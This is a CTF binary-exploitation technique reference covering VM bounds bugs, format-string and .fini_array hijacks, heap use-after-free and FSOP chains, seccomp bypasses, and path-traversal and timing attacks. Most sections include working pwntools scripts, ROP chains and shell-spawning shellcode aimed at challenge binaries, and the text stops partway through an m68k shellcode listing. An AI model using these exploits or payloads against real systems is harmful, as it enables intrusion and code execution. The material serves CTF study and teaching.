# CTF Pwn - Advanced Exploit Techniques

## Table of Contents
- [VM Signed Comparison Bug (0xFun 2026)](#vm-signed-comparison-bug-0xfun-2026)
- [BF JIT Unbalanced Bracket to RWX Shellcode (VuwCTF 2025)](#bf-jit-unbalanced-bracket-to-rwx-shellcode-vuwctf-2025)
- [Type Confusion in Interpreter (VuwCTF 2025)](#type-confusion-in-interpreter-vuwctf-2025)
- [Off-by-One Index to Size Corruption (VuwCTF 2025)](#off-by-one-index-to-size-corruption-vuwctf-2025)
- [Double win() Call Pattern (VuwCTF 2025)](#double-win-call-pattern-vuwctf-2025)
- [DNS Record Buffer Overflow](#dns-record-buffer-overflow)
- [ASAN Shadow Memory Exploitation](#asan-shadow-memory-exploitation)
- [Format String with Encoding Constraints + RWX .fini_array Hijack](#format-string-with-encoding-constraints--rwx-fini_array-hijack)
- [Custom Canary Preservation](#custom-canary-preservation)
- [Integer Truncation via Order of Operations (CSAW 2015)](#integer-truncation-via-order-of-operations-csaw-2015)
- [Signed Integer Bypass (Negative Quantity)](#signed-integer-bypass-negative-quantity)
- [Canary-Aware Partial Overflow](#canary-aware-partial-overflow)
- [Global Buffer Overflow (CSV Injection)](#global-buffer-overflow-csv-injection)
- [MD5 Preimage Gadget Construction](#md5-preimage-gadget-construction)
- [VM GC-Triggered UAF — Slab Reuse (EHAX 2026)](#vm-gc-triggered-uaf--slab-reuse-ehax-2026)
- [Path Traversal Sanitizer Bypass](#path-traversal-sanitizer-bypass)
- [Timing Attack for Character-by-Character Flag Recovery (RC3 CTF 2016)](#timing-attack-for-character-by-character-flag-recovery-rc3-ctf-2016)
- [FSOP + Seccomp Bypass via openat/mmap/write (EHAX 2026)](#fsop--seccomp-bypass-via-openatmmapwrite-ehax-2026)
- [Motorola 68000 (m68k) Two-Stage Shellcode (HackIT 2017)](#motorola-68000-m68k-two-stage-shellcode-hackit-2017)
- [DOS COM Real Mode Shellcode (SEC-T CTF 2017)](#dos-com-real-mode-shellcode-sec-t-ctf-2017)
- [Seccomp BPF X-Register Addressing Mode Bypass (HITCON 2017)](#seccomp-bpf-x-register-addressing-mode-bypass-hitcon-2017)
- [Custom Printf Format Specifier Arginfo Overwrite (Hack.lu 2017)](#custom-printf-format-specifier-arginfo-overwrite-hacklu-2017)

---

## VM Signed Comparison Bug (0xFun 2026)

**Pattern (CHAOS ENGINE):** Custom VM STORE opcode checks `offset <= 0xfff` with signed `jle` but no lower bound check.

**Exploit:**
1. Negative offsets reach function pointer table below data area
2. Build values byte-by-byte in VM memory using VM arithmetic
3. LOAD as qwords, compute negative offsets via XOR with 0xFF..FF
4. Overwrite HALT handler with `system@plt`
5. Trigger HALT with "sh" string pointer as argument

**General lesson:** Signed vs unsigned comparison bugs in custom VMs are common. Always check bounds in both directions. Function pointer tables near data buffers = easy RCE.
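
The difference between the signed and unsigned check can be sketched in a few lines of Python. This is only a model of the comparison, assuming a 64-bit operand; the helper names are made up for illustration and are not taken from the challenge binary. It also shows the XOR trick from step 3 for building a negative offset.

```python
import ctypes

MASK = 0xFFFFFFFFFFFFFFFF
LIMIT = 0xFFF

def signed_check(offset: int) -> bool:
    """Model of `cmp reg, 0xfff; jle ok` (operand treated as signed 64-bit)."""
    return ctypes.c_int64(offset).value <= LIMIT

def unsigned_check(offset: int) -> bool:
    """Model of `cmp reg, 0xfff; jbe ok` (same bits, unsigned interpretation)."""
    return ctypes.c_uint64(offset).value <= LIMIT

# Two's-complement negation as the VM program would compute it: (x XOR 0xFF..FF) + 1
neg8 = ((8 ^ MASK) + 1) & MASK   # 0xfffffffffffffff8, i.e. -8

print(hex(neg8), signed_check(neg8), unsigned_check(neg8))
```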

---

## BF JIT Unbalanced Bracket to RWX Shellcode (VuwCTF 2025)

**Pattern (Blazingly Fast Memory Unsafe):** BF JIT compiler uses stack for `[`/`]` control flow. Unbalanced `]` pops values from prologue.

**Vulnerability:** `]` (LOOP_END) pops return address from stack. Without matching `[`, it pops the **tape address** which resides in **RWX memory**.

**Exploit:**
```python
# Stage 1: Write shellcode to tape via BF +/- operations, then trigger ]
# Use - for bytes >127 (0xff = 1 decrement vs 255 increments)
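from pwn import *
context.arch = 'amd64'  # assumption: x86-64 target, implied by the r14 register below

stage1 = b''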
# Build read(0, tape, 256) shellcode on tape
shellcode_bytes = asm(shellcraft.read(0, 'r14', 256))
for byte in shellcode_bytes:
    if byte <= 127:
        stage1 += b'+' * byte + b'>'
    else:
        stage1 += b'-' * (256 - byte) + b'>'
stage1 += b']'  # Unbalanced ] jumps to tape (RWX)

# Stage 2: Send full execve("/bin/sh") shellcode via stdin after Stage 1 runs
```

**Identification:** JIT compilers using stack for bracket matching + RWX tape memory.

---

## Type Confusion in Interpreter (VuwCTF 2025)

**Pattern (Idempotence):** Lambda calculus interpreter's `simplify_normal_order()` unconditionally sets function type to ABS (abstraction), even when it's a VAR (variable).

**Key insight:** VAR's unused bytes 16-23 get interpreted as body pointer. When `print_expression()` encounters type > 2, it dumps raw bytes as UNKNOWN_DATA — flag bytes interpreted as type value trigger the dump.

**General lesson:** Type confusion in interpreters occurs when type tags aren't validated before downcasting. Unused padding bytes in one variant become active fields in another.

---

## Off-by-One Index to Size Corruption (VuwCTF 2025)

**Pattern (Kiwiphone):** Index 0 writes to `entries[-1]`, overlapping a struct's `size` field.

**Exploit chain:**
1. Write to index 0 with crafted data to set `phonebook.size = 48` (normally 16)
2. `print_all` now dumps 48 entries, leaking stack canary, saved RBP, and libc return address
3. Calculate libc base from leaked return address
4. Write ROP chain into entries 17-22: `[canary] [rbp] [ret] [pop_rdi] [/bin/sh] [system]`
5. Exit with -1 to trigger return through ROP chain

**Format trick:** Phone format `+48 0 0-0` doubles as valid phone number AND size overwrite value.

---

## Double win() Call Pattern (VuwCTF 2025)

**Pattern (Tokaid):** `win()` has `if (attempts++ > 0)` check — first call increments from 0 (fails), second call succeeds.

**Payload:** Stack two return addresses: `b'A'*offset + p64(win) + p64(win)`

**PIE calculation:** When main address is leaked: `base = main_leak - main_offset; win = base + win_offset`.
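
A minimal sketch of the payload construction, using only `struct` so it runs without pwntools. The leak value, symbol offsets, and padding length below are hypothetical placeholders, not values from the challenge.

```python
import struct

def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian address."""
    return struct.pack("<Q", value)

def build_payload(main_leak: int, main_offset: int, win_offset: int, pad_len: int) -> bytes:
    base = main_leak - main_offset       # PIE base from the leaked main address
    win = base + win_offset
    # Two stacked return addresses: the first win() call fails the check,
    # returns into the second copy, and the second call passes.
    return b"A" * pad_len + p64(win) + p64(win)

# Hypothetical numbers for illustration only
payload = build_payload(main_leak=0x555555555189, main_offset=0x1189,
                        win_offset=0x11C9, pad_len=72)
```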

---

## DNS Record Buffer Overflow

**Pattern (Do Not Strike The Clouds):** Many AAAA records overflow stack buffer in DNS response parser.

**Exploitation:**
1. Set up DNS server returning excessive AAAA records
2. Target binary queries DNS, copies records into fixed-size stack buffer
3. Many records overflow into return address
4. Overwrite with win function address
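
Step 1 can be sketched as a function that answers a query with an arbitrary number of AAAA records. This is a rough illustration using only `struct`; the sample query, the record count, and the 16 payload bytes are assumptions, and a real response this large may need TCP or EDNS because plain UDP DNS is limited to 512 bytes.

```python
import struct

def build_aaaa_flood(query: bytes, n_records: int, addr: bytes) -> bytes:
    """Answer `query` with n_records AAAA records, each carrying 16 chosen bytes."""
    assert len(addr) == 16
    txid = query[:2]
    # Question section: QNAME ends at the first zero byte, then QTYPE + QCLASS
    q_end = query.index(b"\x00", 12) + 5
    question = query[12:q_end]
    # Flags 0x8180 = standard response; QDCOUNT=1, ANCOUNT=n_records
    header = txid + struct.pack(">HHHHH", 0x8180, 1, n_records, 0, 0)
    # 0xC00C is a compression pointer to the name at offset 12; TYPE 28 = AAAA
    record = struct.pack(">HHHIH", 0xC00C, 28, 1, 60, 16) + addr
    return header + question + record * n_records

# Hypothetical query for example.com / AAAA
query = (struct.pack(">HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0)
         + b"\x07example\x03com\x00" + struct.pack(">HH", 28, 1))
response = build_aaaa_flood(query, 40, b"B" * 16)
```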

## ASAN Shadow Memory Exploitation

**Pattern (Asan-Bazar, Nullcon 2026):** Binary compiled with AddressSanitizer has format string + OOB write vulnerabilities.

**ASAN Shadow Byte Layout:**
| Shadow Value | Meaning |
|-------------|---------|
| `0x00` | Fully accessible (8 bytes) |
| `0x01-0x07` | Partially accessible (1-7 bytes) |
| `0xF1` | Stack left redzone |
| `0xF3` | Stack right redzone |
| `0xF5` | Stack use after return |

**Key Insight:** ASAN may use a "fake stack" (50% chance) — areas past the ASAN frame have shadow `0x00` on the real stack but different on the fake stack. Detect which by leaking the return address offset.

**Exploitation Pattern:**
```python
# 1. Leak PIE base via format string
payload = b'%8$p'  # Code pointer at known offset
pie_base = leaked - known_offset

# 2. Detect real vs fake stack
# Real stack: return address at known offset from format string buffer
# Check if leaked return address matches expected function offset
is_real_stack = (ret_addr - pie_base) == 0xdc052  # known offset

# 3. Calculate OOB write offset
# Format string buffer at stack offset N
# Target (return address) at stack offset M
# Distance in bytes = (M - N) * 8
# Map to ledger system: slot = distance // 16, sub_offset = distance % 16

# 4. Overwrite return address with win() via OOB ledger write
# Retry until real stack is used (~50% success rate per attempt)
```

**Single-Interaction Exploitation:** Combine leak + detect + exploit in one format string interaction. If fake stack detected, disconnect and retry.
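
The offset arithmetic from step 3 is small enough to write out. The sketch below assumes 8-byte stack words and 16-byte ledger slots as described in the comments above; the argument positions passed in are hypothetical.

```python
def ledger_target(buf_arg: int, target_arg: int, word: int = 8, slot_size: int = 16):
    """Map the gap between two format-string argument positions to (slot, sub_offset)."""
    distance = (target_arg - buf_arg) * word   # distance in bytes
    return distance // slot_size, distance % slot_size

# Hypothetical: buffer at argument 8, return address at argument 21
slot, sub_offset = ledger_target(8, 21)
```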

## Format String with Encoding Constraints + RWX .fini_array Hijack

**Pattern (Encodinator, Nullcon 2026):** Input is base85-encoded into RWX memory at fixed address, then passed to `printf()`.

**Key insight:** Don't try libc-based exploitation. Instead, exploit the RWX mmap region directly:

1. **RWX region at fixed address** (e.g., `0x40000000`): Write shellcode here
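2. **`.fini_array` hijack**: Overwrite `.fini_array[0]` to point to shellcode. When `main()` returns, the exit path runs the `.fini_array` entries (`_dl_fini` in dynamically linked binaries, `__libc_csu_fini` in static binaries built against older glibc).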
3. **Format string writes**: Use `%hn` to write 2 bytes at a time to `.fini_array`
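
One way to lay out the `%hn` writes is sketched below. The `.fini_array` address and the starting argument index are hypothetical, and the sketch ignores the base85 layer entirely; it only shows how a 64-bit value splits into four 2-byte writes ordered so the printed character count never has to decrease.

```python
import struct

def hn_writes(target: int, value: int, halfwords: int = 4):
    """Split value into 16-bit chunks: [(address, halfword), ...]."""
    return [(target + 2 * i, (value >> (16 * i)) & 0xFFFF) for i in range(halfwords)]

def build_fmt(writes, arg_base: int) -> bytes:
    # Emit writes in ascending halfword order; pointer i sits at argument arg_base + i
    order = sorted(range(len(writes)), key=lambda i: writes[i][1])
    printed, out = 0, ""
    for i in order:
        half = writes[i][1]
        pad = half - printed
        if pad:                      # "%0c" would still print one char, so skip it
            out += f"%{pad}c"
            printed = half
        out += f"%{arg_base + i}$hn"
    return out.encode()

FINI_ARRAY = 0x403E18    # hypothetical address of .fini_array[0]
SHELLCODE = 0x40000000   # fixed RWX region from the pattern above
writes = hn_writes(FINI_ARRAY, SHELLCODE)
fmt = build_fmt(writes, arg_base=20)
pointers = b"".join(struct.pack("<Q", addr) for addr, _ in writes)
```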

**Argument numbering with base85:**
Base85 decoding changes payload length. The decoded prefix occupies P bytes on stack, so first appended pointer is at arg `6 + P/8`. Use convergence loop:

```python
arg_base = 20  # Initial guess
for _ in range(20):
    fmt = construct_format_string(writes, arg_base)
    # Pad to a multiple of 10 encoded chars (two base85 groups = 8 raw bytes) so appended pointers stay 8-byte aligned
    while len(fmt) % 10 != 0:
        fmt += b"A"
    prefix = b85_decode(fmt)
    new_arg_base = 6 + (len(prefix) // 8)
    if new_arg_base == arg_base:
        break
    arg_base = new_arg_base
```

**Shellcode (22-byte execve):**
```nasm
push 0x3b          ; syscall number
pop rax
cdq                ; rdx = 0
movabs rbx, 0x68732f2f6e69622f  ; "/bin//sh"
push rdx           ; null terminator
push rbx           ; "/bin//sh"
push rsp
pop rdi            ; rdi = pointer to "/bin//sh"
push rdx
pop rsi            ; rsi = NULL
syscall
```

**Why avoid libc:** Base85 encoding makes precise libc address calculations extremely difficult. The RWX region + .fini_array approach uses only fixed addresses (no ASLR, no PIE concerns for the write target).

## Custom Canary Preservation

**Pattern (Canary In The Bitcoin Mine):** Buffer overflow must preserve known canary value.

**Key technique:** Write the exact canary bytes at the correct offset during overflow:
```python
# Buffer: 64 bytes | Canary: "BIRD" (4 bytes) | Target: 1 byte
payload = b'A' * 64 + b'BIRD' + b'X'  # Preserve canary, set target to non-zero
```

**Identification:** Source code shows struct with buffer + canary + flag bool, `gets()` for input.

---

## Integer Truncation via Order of Operations (CSAW 2015)

Incorrect integer arithmetic ordering causes truncation bugs:

```c
// Vulnerable: integer division truncates before multiply
int position = 4 * (ticks / 1000);  // 1500 ticks -> 4 * 1 = 4

// Correct: multiply first to preserve precision
int position = (4 * ticks) / 1000;  // 1500 ticks -> 6000 / 1000 = 6
```

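The two orderings disagree (4 vs. 6 for 1500 ticks). When a buffer is sized with one form and indexed with the other, the position lands past the buffer end (by 2 bytes in this example). This off-by-N error enables: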
1. Heap metadata corruption via out-of-bounds write
2. Adjacent object pointer overwrite for read/write primitives
3. Chain with heap spray for ASLR bypass via information leak

**Key insight:** Audit integer expressions where division precedes multiplication -- the result can fall short of the precise value by up to `multiplier - 1` (0 to 3 here), depending on the remainder the division discards.
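
The gap between the two orderings is easy to measure. The sketch below mirrors the C expressions with Python integer division (equivalent for non-negative values); the function names are illustrative.

```python
def truncating(ticks: int, scale: int = 4, unit: int = 1000) -> int:
    """scale * (ticks / unit): the division discards the remainder first."""
    return scale * (ticks // unit)

def precise(ticks: int, scale: int = 4, unit: int = 1000) -> int:
    """(scale * ticks) / unit: multiply first, then divide."""
    return (scale * ticks) // unit

# Collect every difference that occurs over a range of inputs
gaps = {precise(t) - truncating(t) for t in range(100_000)}
print(truncating(1500), precise(1500), sorted(gaps))
```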

---

## Signed Integer Bypass (Negative Quantity)

**Pattern (PascalCTF 2026):** Menu program with `scanf("%d")` for quantity. Negative input makes `quantity * price` negative, bypassing `balance >= total_cost` check.

```python
# Select expensive item (e.g., flag drink costing 1B), enter quantity -1
# -1 * 1000000000 = -1000000000 → balance (100) >= -1000000000 ✓
p.sendline(b'10')  # flag item
p.sendline(b'-1')  # negative quantity
```
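
A small model of the check shows why the negative quantity passes. It assumes the total is stored in a 32-bit signed `int`, which is a guess about the binary rather than something confirmed by the challenge.

```python
import ctypes

def can_afford(balance: int, price: int, quantity: int):
    """Model of `total = quantity * price; if (balance >= total)` with a 32-bit int."""
    total = ctypes.c_int32(price * quantity).value   # wraps like a C int
    return balance >= total, total

print(can_afford(100, 1_000_000_000, 1))    # normal purchase is rejected
print(can_afford(100, 1_000_000_000, -1))   # negative quantity passes the check
```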

## Canary-Aware Partial Overflow

**Pattern (MyGit, PascalCTF 2026):** Buffer overflow where `valid` flag sits between buffer end and canary.

**Stack layout:**
- Buffer: `rbp-0x30` (32 bytes, ending where the valid flag begins)
- Valid flag: `rbp-0x10` (offset 32 from buffer)
- Stack canary: `rbp-0x08` (offset 40 from buffer)

**Key technique:** Use `./` as no-op path padding to control input length precisely:
```text
././././././././././../../../../flag    (36 bytes)
```
- `./` segments normalize to current directory (no-op)
- Byte 32 must be non-zero to set `valid = true`
- Stay under byte 40 to avoid canary

**Exploit chain:**
1. `checkout ././././././././././../../../../flag` - reads `/flag` content as "current commit"
2. `branch create ././././././././././../../../../tmp/leaked` - writes commit (flag) to `/tmp/leaked`
3. `cat /tmp/leaked` - read the exfiltrated flag
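
The padded path can be generated rather than counted by hand. This helper is a sketch (the name `pad_path` is made up) that prepends `./` segments until the path reaches an exact length, then checks the constraints from the stack layout above.

```python
def pad_path(path: str, total_len: int) -> str:
    """Prefix `path` with no-op './' segments until it is exactly total_len bytes."""
    pad = total_len - len(path)
    if pad < 0 or pad % 2:
        raise ValueError("target length must exceed the path by an even number of bytes")
    return "./" * (pad // 2) + path

payload = pad_path("../../../../flag", 36)
assert payload[32] != "\x00"   # byte 32 lands on the valid flag and must be non-zero
assert len(payload) < 40       # the string and its terminator stay below the canary
print(payload)
```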

## Global Buffer Overflow (CSV Injection)

**Pattern (Spreadsheet):** Adjacent global variables exploitable via overflow.

**Exploitation:**
1. Identify global array adjacent to filename pointer in memory
2. Overflow array bounds by injecting extra delimiters (commas in CSV)
3. Overflowed pointer lands on filename variable
4. Change filename to `flag.txt`, then trigger read operation

```python
# Edit last cell with comma-separated overflow
edit_cell("J10", "whatever,flag.txt")
save()   # CSV row now has 11 columns
load()   # Column 11 overwrites savefile pointer with ptr to "flag.txt"
load()   # Now reads flag.txt into spreadsheet
print_spreadsheet()  # Shows flag
```

## MD5 Preimage Gadget Construction

**Pattern (Hashchain, Nullcon 2026):** Server concatenates N MD5 digests and executes them as code. Brute-force preimages with desired byte prefixes.

**Core technique:** Each MD5 digest is 16 bytes. Use `eb 0c` (jmp +12) as first 2 bytes to skip the middle 12 bytes, landing on bytes 14-15 which become a 2-byte instruction:

```c
// Brute-force MD5 preimage with prefix eb0c and desired 2-byte suffix
for (uint64_t ctr = 0; ; ctr++) {
    sprintf(msg + prefix_len, "%016llx", (unsigned long long)ctr);  // cast: uint64_t is not always unsigned long long
    MD5(msg, msg_len, digest);
    if (digest[0] == 0xEB && digest[1] == 0x0C) {
        uint16_t suffix = (digest[14] << 8) | digest[15];
        if (suffix == target_instruction)
            break;  // Found!
    }
}
```

**Building i386 syscall chains from 2-byte gadgets:**
- `31c0` = `xor eax, eax`
- `89e1` = `mov ecx, esp`
- `b220` = `mov dl, 0x20`
- `cd80` = `int 0x80`
- `40` + NOP = `inc eax`

**Hashchain v1 (JMP to NOP sled):** RWX buffer at `0x40000000` + NOP sled at `0x41000000`. Find MD5 preimage starting with `0xE9` (jmp rel32) that lands in the sled:
```python
# Brute-force: find input whose MD5 starts with E9 and offset lands in NOP sled
# Example: b"v" + b"G" * 86 → MD5 starts with e9 59 1f 2c → jmp 0x412c1f5e
```

**Hashchain v2 (3-hash chain):** Store MD5 digests at user-controlled offsets. Build instruction chain:
- **Offset 0 (jmp +2):** Find input whose MD5 starts with `EB 02` (e.g., `143874`)
- **Offset 4 (push win):** Find input whose MD5 starts with `68 XX XX XX` matching win() address bytes
- **Offset 8 (ret):** Find input whose MD5 byte[1] is `C3` (e.g., `5488` → `56 C3`)

**Pre-computation approach:** Build lookup table mapping MD5 4-byte prefixes to inputs. At runtime, parse win() address from server banner, look up matching push-hash input.

**Brute-force time:** 32-bit prefix match: ~2^32 hashes (~60s on 8 cores). 16-bit: instant.
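
For short prefixes, the same search runs quickly in pure Python. The sketch below uses decimal counters as candidate inputs, which is an arbitrary choice for illustration; a 16-bit prefix needs roughly 2^16 hashes on average.

```python
import hashlib
from itertools import count

def find_preimage(prefix: bytes, suffix: bytes = b""):
    """Return (message, digest) where the MD5 digest has the given prefix and suffix."""
    for ctr in count():
        msg = str(ctr).encode()
        digest = hashlib.md5(msg).digest()
        if digest.startswith(prefix) and digest.endswith(suffix):
            return msg, digest

# Digest beginning with eb 0c (jmp +12), as used for the 2-byte gadget chain
msg, digest = find_preimage(b"\xeb\x0c")
print(msg, digest.hex())
```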

## VM GC-Triggered UAF — Slab Reuse (EHAX 2026)

**Pattern (SarcAsm):** Custom stack-based VM with NEWBUF/SLICE/GC/BUILTIN opcodes. Slicing a buffer creates a shared reference to the same slab. When the slice is dropped and GC'd, it frees the shared slab even though the parent buffer is still alive.

**Vulnerability:** `free_data()` called on slice frees the underlying slab pointer that the parent buffer still references → UAF read/write through parent.

**Exploit chain:**
1. `NEWBUF 24` → allocates 32-byte slab (slab class matches function objects)
2. `READ 24` → fills buffer, sets length so SLICE bounds check passes
3. `SLICE 0,24` → alias to same slab
4. `DROP` + `GC` → frees the slab via slice's destructor
5. `BUILTIN 0` → allocates function object, reuses freed 32-byte slab (code pointer at offset +8)
6. `WRITEBUF 16,0` → sets parent buffer's length to 16 (no actual write, bypasses bounds)
7. `PRINTB` → leaks code pointer from UAF slab → compute PIE base
8. `READ 16` → overwrites code pointer with `win()` address
9. `CALL` → executes `win()` → `execve("/bin/sh")`

```python
from pwn import *
import struct

# ULEB128 encoding for VM immediates
def uleb128(val):
    result = b''
    while True:
        byte = val & 0x7f
        val >>= 7
        if val: byte |= 0x80
        result += bytes([byte])
        if not val: break
    return result

# Opcodes
NEWBUF, READ, SLICE, DROP, GC = b'\x20', b'\x21', b'\x22', b'\x04', b'\x60'
BUILTIN, CALL, GLOAD, GSTORE = b'\x40', b'\x41', b'\x30', b'\x31'
WRITEBUF, PRINTB, PUSH, HALT = b'\x25', b'\x23', b'\x01', b'\xff'

code = b''
code += NEWBUF + uleb128(24) + GSTORE + uleb128(0)  # buf A in slot 0
code += GLOAD + uleb128(0) + READ + uleb128(24)      # fill to set length
code += GLOAD + uleb128(0) + SLICE + uleb128(0) + uleb128(24)  # slice
code += DROP + GC                                      # free slab via slice
code += BUILTIN + uleb128(0) + GSTORE + uleb128(1)   # func F reuses slab
code += GLOAD + uleb128(0) + WRITEBUF + uleb128(16) + uleb128(0)  # set len=16
code += GLOAD + uleb128(0) + PRINTB                    # leak code ptr
code += GLOAD + uleb128(0) + READ + uleb128(16)       # overwrite code ptr
code += PUSH + b'\x00' + GLOAD + uleb128(1) + CALL + uleb128(1)  # call win
code += HALT

blob = struct.pack('<I', len(code)) + code
p = remote('target', 9999)
p.send(blob + b'A'*24)          # blob + dummy READ data
leak = p.recvn(16, timeout=5)   # recvn waits for all 16 bytes; recv may return fewer
code_ptr = struct.unpack('<Q', leak[:8])[0]
win_addr = (code_ptr - 0x31d0) + 0x3000  # PIE base + win offset
p.send(struct.pack('<Q', win_addr) + b'\x00'*8)
p.sendline(b'cat /flag*')
p.interactive()
```

**Key lessons:**
- **Slab allocator reuse:** Function objects and buffer data share the same slab size class → guaranteed UAF overlap
- **WRITEBUF length trick:** Setting length without writing data bypasses bounds checks but exposes UAF content
- **GC as trigger:** Explicit `GC` opcode forces immediate collection → deterministic UAF timing
- **General pattern:** In custom VMs, look for shared references (slices, views, aliases) where destruction of one frees resources still held by another

---

## Path Traversal Sanitizer Bypass

**Pattern (Galactic Archives):** Sanitizer skips character after finding banned char.

```python
# Sanitizer removes '.' and '/' but skips next char after match
# ../../etc/passwd -> bypass with doubled chars:
"....//....//etc//passwd"
# Each '..' becomes '....' (first '.' caught, second skipped, third caught, fourth survives)
```
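
The bypass can be checked against a model of the sanitizer. The function below is an assumed reconstruction of the buggy behavior described above (drop the banned character, then let the following character through unchecked), not the challenge's actual code.

```python
BANNED = {".", "/"}

def buggy_sanitize(s: str) -> str:
    out = []
    i = 0
    while i < len(s):
        if s[i] in BANNED:
            # Drop the banned char, then copy the next char without checking it
            if i + 1 < len(s):
                out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)

print(buggy_sanitize("....//....//etc//passwd"))
```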

**Flag via `/proc/self/fd/N`:**
- If binary opens flag file but doesn't close fd, read via `/proc/self/fd/3`
- fd 0=stdin, 1=stdout, 2=stderr, 3=first opened file

## Timing Attack for Character-by-Character Flag Recovery (RC3 CTF 2016)

When a server validates input character-by-character with measurable per-character delay, use timing side-channels to brute-force the flag one byte at a time.

```python
import socket
import time
import string

def measure_time(host, port, guess):
    """Send guess and measure server response time"""
    s = socket.socket()
    s.connect((host, port))
    s.recv(1024)  # banner

    start = time.perf_counter()  # monotonic clock, better suited to interval timing
    s.sendall(guess.encode() + b'\n')
    s.recv(1024)
    elapsed = time.perf_counter() - start

    s.close()
    return elapsed

host, port = "target", 9999  # placeholders: set to the challenge server
flag = "RC3-2016-"
charset = string.ascii_letters + string.digits + "_-{}"
THRESHOLD = 0.15  # seconds per correct character (calibrate per target)
SAMPLES = 3       # average multiple measurements to reduce noise

while not flag.endswith('}'):
    best_char = ''
    best_time = 0

    for c in charset:
        guess = flag + c
        # Average multiple samples to reduce network jitter
        avg_time = sum(measure_time(host, port, guess) for _ in range(SAMPLES)) / SAMPLES

        if avg_time > best_time:
            best_time = avg_time
            best_char = c

    if best_time > len(flag) * THRESHOLD:
        flag += best_char
        print(f"Flag so far: {flag} (time: {best_time:.3f}s)")
    else:
        print("Timing unclear, retrying...")

print(f"Flag: {flag}")
```

**Key insight:** Each correct character adds a measurable delay (typically 100-250ms). Average multiple samples to overcome network jitter. The total response time scales linearly with the number of correct prefix characters, making the correct character at each position distinguishable.

---

## FSOP + Seccomp Bypass via openat/mmap/write (EHAX 2026)

**Pattern (The Revenge of Womp Womp):** Heap exploit (UAF) leading to FSOP chain, but seccomp blocks the standard `open`/`read` syscalls and `execve`. Use alternative syscalls to read the flag.

**Exploit chain:**
1. **Leak libc** via `show()` on freed unsorted bin chunk (fd/bk pointers)
2. **UAF → unsafe unlink** to redirect pointer to `.bss` region
3. **Craft fake FILE** structure on heap with vtable pointing to `_IO_wfile_jumps`
4. **FSOP chain:** `_IO_wfile_overflow` → `_IO_wdoallocbuf` → `_IO_WDOALLOCATE(fp)`
5. **Stack pivot** via `mov rsp, rdx` gadget (rdx controllable from FILE struct)
6. **ROP chain** using seccomp-compatible syscalls

**Seccomp bypass with openat/mmap/write:**
```python
# When seccomp blocks open() and read(), use:
# openat(AT_FDCWD, "/flag", O_RDONLY)  - syscall 257
# mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd, 0)  - syscall 9
# write(STDOUT, mapped_addr, 4096)  - syscall 1

from pwn import *

rop = ROP(libc)
# openat(AT_FDCWD=-100, "/flag", O_RDONLY=0)
rop.raw(pop_rdi)
rop.raw(-100 & 0xffffffffffffffff)  # AT_FDCWD
rop.raw(pop_rsi)
rop.raw(flag_str_addr)               # pointer to "/flag\x00"
rop.raw(pop_rdx_rbx)
rop.raw(0)                            # O_RDONLY
rop.raw(0)
rop.raw(libc.sym.openat)

# mmap(NULL, 4096, PROT_READ=1, MAP_PRIVATE=2, fd=3, 0)
rop.raw(pop_rdi)
rop.raw(0)                            # addr = NULL
rop.raw(pop_rsi)
rop.raw(0x1000)                       # length
rop.raw(pop_rdx_rbx)
rop.raw(1)                            # PROT_READ
rop.raw(0)
# rcx = MAP_PRIVATE (2), r8 = fd (3), r9 = 0 - need gadgets for these
# (the libc wrapper takes arg 4 in rcx; r10 is only used for a raw syscall instruction)
rop.raw(libc.sym.mmap)

# write(1, mapped_addr, 4096)
rop.raw(pop_rdi)
rop.raw(1)                            # stdout
rop.raw(pop_rsi)
rop.raw(mapped_addr)                  # mmap return value (left in rax; needs a mov gadget or a fixed mapping address)
rop.raw(pop_rdx_rbx)
rop.raw(0x1000)
rop.raw(0)
rop.raw(libc.sym.write)
```

**`mov rsp, rdx` stack pivot gadget:**
```python
# Common in libc — search with:
# ROPgadget --binary libc.so.6 | grep "mov rsp, rdx"
# or: ropper --file libc.so.6 --search "mov rsp, rdx"

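# In FSOP context: rdx is often loaded from attacker-controlled fake FILE /
# _IO_wide_data fields by the time _IO_WDOALLOCATE is called. Which field ends up
# in rdx depends on the libc build, so confirm the register state in a debugger.
# Note: _IO_wdoallocbuf returns early if _wide_data->_IO_buf_base is non-NULL,
# so that field must stay 0 for the call to be reached.
# Pivot: mov rsp, rdx → ROP chain runs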
```

**Key insight:** "Stale size tracking" = the menu tracks object sizes but doesn't invalidate after free. This enables UAF because `show()`/`edit()` still use the old size to access freed memory. Always check if delete nullifies the size field in addition to the pointer.

**Seccomp alternative syscall quick reference:**
| Blocked | Alternative | Syscall # |
|---------|------------|-----------|
| `open` | `openat` | 257 |
| `open` | `openat2` | 437 |
| `read` | `mmap` + access | 9 |
| `read` | `pread64` | 17 |
| `read` | `readv` | 19 |
| `write` | `writev` | 20 |
| `write` | `sendfile` | 40 |

---

## Motorola 68000 (m68k) Two-Stage Shellcode (HackIT 2017)

**Pattern:** m68k Linux binary accepts only 14 bytes of shellcode. Two-stage approach: the first stage jumps back to the binary's own `read()` call with a larger buffer size and the existing mmap'd RWX pointer. The full second-stage shellcode performs socket reuse via `dup2` and `execve('/bin/sh')`. m68k syscall convention: number in `d0`, arguments in `d1`–`d3`, `trap #0`.

m68k Linux syscall numbers: `read=3`, `write=4`, `dup2=63`, `execve=11`.

```asm
; Stage 1 (12 bytes, within the 14-byte limit): patch d3=256 and jump to binary's read() call site
; Reuses binary's existing socket fd (d1) and mmap'd RWX region (d2)
move.l  #256, %d3        ; count = 256  (6 bytes: 0x263C 0x0000 0x0100)
jmp     read_call_site   ; jump to binary's trap #0  (6 bytes: 0x4EF9 + 4-byte addr)
```
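
When no m68k assembler is at hand, the first stage can be packed by hand from the opcode words shown in the comments. This is a sketch; the call-site address is a hypothetical placeholder to be replaced with the address of the binary's `trap #0`.

```python
import struct

def stage1(read_call_site: int, count: int = 256) -> bytes:
    """Hand-assemble `move.l #count, %d3; jmp read_call_site` (big-endian m68k)."""
    move_l_d3 = struct.pack(">HI", 0x263C, count)         # move.l #imm32, %d3
    jmp_abs = struct.pack(">HI", 0x4EF9, read_call_site)  # jmp (xxx).L
    return move_l_d3 + jmp_abs

sc = stage1(0x80000512)   # hypothetical address of the read() call site
assert len(sc) <= 14      # fits the size limit
print(sc.hex())
```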

```asm
; Stage 2 (full shellcode read into RWX region by stage 1):
; dup2(sock_fd, 0/1/2) — sock_fd is already in d1 from stage 1
moveq   #63, %d0         ; dup2
moveq   #0,  %d2         ; newfd = stdin
trap    #0
moveq   #63, %d0
moveq   #1,  %d2         ; newfd = stdout
